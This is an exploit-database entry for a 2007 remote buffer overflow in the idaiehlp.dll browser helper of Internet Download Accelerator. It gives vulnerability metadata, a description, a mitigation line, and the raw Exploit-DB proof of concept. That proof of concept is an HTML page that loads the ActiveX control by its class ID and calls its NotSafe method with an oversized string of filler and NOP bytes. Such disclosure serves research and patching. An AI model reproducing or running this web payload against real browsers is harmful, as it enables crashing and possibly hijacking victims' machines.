Internet Download Accelerator idaiehlp.dll Remote Buffer Overflow Vulnerability

vendor:

Internet Download Accelerator

by:

Dr.Pantagon

7.5

CVSS

HIGH

Remote Buffer Overflow

CWE

Product Name: Internet Download Accelerator

Affected Version From: 4.x

Affected Version To: 6.x

Patch Exists: NO

Related CWE:

CPE:

Metasploit:

Other Scripts:

Platforms Tested: Windows (Tested on Winados SP2)

2007

Internet Download Accelerator idaiehlp.dll Remote Buffer Overflow Vulnerability

This exploit targets a vulnerability in the idaiehlp.dll file of Internet Download Accelerator. By sending a specially crafted string as an argument to the NotSafe method of the idaiehlp object, an attacker can trigger a buffer overflow and potentially execute arbitrary code on the target system.

Mitigation:

Upgrade to a newer version of Internet Download Accelerator or uninstall the software if not needed.

Source

Exploit-DB raw data:

<!--========================== ==================================================
Internet Explorer ver 6.0 , 7.0
Tested On Winados SP2
DeltahackingSecurityTEAM
Bug discovered by Dr.Pantagon
Affected Software: idaiehlp.dll  (IE 4.x-6.x BHO for Internet Download Accelerator)
DLL VER : 1.9.1.74
program ver : 5.2
download link : http://download1.westbyte.com/ida/idasetup.exe
Company Dll : WestByte
site www. westbyte.com
www.Deltahacking.net
www.Deltasecurity.ir
==============================================================================-->
<html>
<object classid="clsid:2A646672-9C3A-4C28-9A7A-1FB0F63F28B6" id="idaiehlp"></object>
<script language='vbscript'>
arg1=String(999999, "A") + String(999999, unescape("%90"))
idaiehlp.NotSafe (arg1)
</script>

# milw0rm.com [2007-06-09]